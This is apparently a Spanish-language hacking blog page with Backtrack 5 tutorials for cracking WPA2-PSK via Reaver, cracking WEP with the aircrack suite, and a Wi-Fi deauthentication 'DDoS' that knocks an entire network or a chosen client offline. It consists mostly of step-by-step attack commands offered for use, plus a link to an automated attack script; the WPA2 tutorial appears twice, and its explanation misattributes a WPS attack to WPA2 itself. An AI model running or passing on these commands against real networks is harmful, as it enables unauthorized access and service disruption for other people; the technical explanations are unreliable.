Vistas de página en total

Mostrando entradas con la etiqueta Wireless Pruebas de Penetración. Mostrar todas las entradas
Mostrando entradas con la etiqueta Wireless Pruebas de Penetración. Mostrar todas las entradas

martes, 23 de febrero de 2016

Backtrack 5 Rompiendo Claves WPA2-PSK

WPA2-PSK:

Bueno el siguiente tutorial muestra como romper una clave WPA2-PSK,siempre que quieren aumentar la seguridad de su red inalámbrica ocupan WPA2-PSK un método de encriptación más robusto que WEP. Básicamente la diferencia es que las claves WPA2-PSK es que soporta claves hasta 63 caracteres alfanuméricos, y dependiendo de la pre-share-key, el sistema genera nuevas claves que transmite al resto de los equipos, lo cual dificulta la acción de cifrado.







Ahora vamos a romper claves WPA2-PSK:

Tutorial
Lo primero que debemos hacer es ejecutar el comando: 

#airmon-ng start wlan0 


El segundo comando a ejecutar es el siguiente:



Con este comando buscamos las redes disponibles y su información en cuanto a BSSID,PWR, Beacons,#Data ,Channel,etc.



Finalmente ejecutamos el siguiente código:

#Reaver  –i  mon0  –b BSSID  -c canal  nombre red
(en la imagen se muestra de acuerdo a la red a desencriptar ,obteniendo el BSSID)


Ya ejecutado el comando comienza a trabajar y a desencriptar..!!!

Finalmente esperamos y nos da la siguiente información, en la cual nos entrega la contraseña de la red a buscar  la que seria:
WPA PSK: ‘jn20110x’, obviamente la escribiremos sin las comillas.


Bueno, eso seria todo, solo en 3 sencillos pasos.
Cabe señalar que el tiempo de espera es entre 10 minutos en adelante, depende la intensidad de la señal.


CONSEJO BTA

Bueno como consejo BTA,te recomendamos entrar a la configuración de tu router y realizar un registro por MAC de los equipos que navegan en tu LAN, así te evitas de cualquier tipo de ataque y vuelves tu red mas segura.
 
 
 

DosWifi


En este tutorial vengo a traeros como tumbar una red Wifi realizando un DDoS bueno para acer esto nececitaremos una tarjeta inalambrica que nos sirva para acer auditoria wireless como la que usamos para crackear redes wep , Tambien nececitaremos tener el aireplay y sobre todo jejejej usar linux bueno pues aca les dejo la explicacion para que se guien de como acer un DDoS de forma manual a una red Wifi y mas abajo les dejo un script.sh para hacer este ataque pero automatizado y su explicacion saludos espero sus respuesta



1-Ponemos la tarjeta de red en modo monitor con el comando : airmon-ng start wlan0



2-Miramos el canal de punto de acceso y ponemos ese canal en modo monitor con el comando : airmon-ng -c 5 mon0  el 5 es el numero del canal y mon0 es la interfaz.



3-Si queremos tumbar una red Wifi entera enviamos paquetes de deautenticacion a un punto de acceso con este comando tumbamos la red Wifi entera dejando sin internet a todos los usuarios conectado a ella aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0  donde 00:11:22:33:44:55  tendria que ser la direccion mac del punto de acceso de la red wifi y mon0 la interfaz.



4-Si solamente queremos tumbar un cliente conectado a la red Wifi enviamos paquetes de deautenticacion a un cliente especifico con este comando tumbamos la conecion Wifi dejando sin internet al cliente  aireplay-ng -0 0 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0  donde 00:11:22:33:44:55  tendria que ser la direccion mac del punto de acceso de la red wifi y 55:44:33:22:11:00  seria la direccion mac del cliente y mon0 la interfaz.




*Aca le dejo el script para que agan todo este ataque automatizado..


                    DESCARGA 

Backtrack 5 Claves WEP

Backtrack 5 Claves WEP




airmon-ng start wlan0  >Colocar modo monitor

airodump-ng mon0  >Escanear REDES ctrl+c Dejar Scanear

airodump-ng -w NOMBREARCHIVO -c N°CANAL --bssid MAC mon0 >Captura Paquetes

aireplay-ng -1 0 -a MAC mon0

aireplay-ng -3 -b MAC mon0

dir  >ver archivo .CAP
aircrack-ng NOMBRE ARICHIVO.cap

Backtrack 5 Rompiendo Claves WPA2-PSK

WPA2-PSK:

Bueno el siguiente tutorial muestra como romper una clave WPA2-PSK,siempre que quieren aumentar la seguridad de su red inalámbrica ocupan WPA2-PSK un método de encriptación más robusto que WEP. Básicamente la diferencia es que las claves WPA2-PSK es que soporta claves hasta 63 caracteres alfanuméricos, y dependiendo de la pre-share-key, el sistema genera nuevas claves que transmite al resto de los equipos, lo cual dificulta la acción de cifrado.







Ahora vamos a romper claves WPA2-PSK:

Tutorial
Lo primero que debemos hacer es ejecutar el comando: 

#airmon-ng start wlan0 


El segundo comando a ejecutar es el siguiente:



Con este comando buscamos las redes disponibles y su información en cuanto a BSSID,PWR, Beacons,#Data ,Channel,etc.



Finalmente ejecutamos el siguiente código:

#Reaver  –i  mon0  –b BSSID  -c canal  nombre red
(en la imagen se muestra de acuerdo a la red a desencriptar ,obteniendo el BSSID)


Ya ejecutado el comando comienza a trabajar y a desencriptar..!!!

Finalmente esperamos y nos da la siguiente información, en la cual nos entrega la contraseña de la red a buscar  la que seria:
WPA PSK: ‘jn20110x’, obviamente la escribiremos sin las comillas.


Bueno, eso seria todo, solo en 3 sencillos pasos.
Cabe señalar que el tiempo de espera es entre 10 minutos en adelante, depende la intensidad de la señal.


CONSEJO BTA

Bueno como consejo BTA,te recomendamos entrar a la configuración de tu router y realizar un registro por MAC de los equipos que navegan en tu LAN, así te evitas de cualquier tipo de ataque y vuelves tu red mas segura.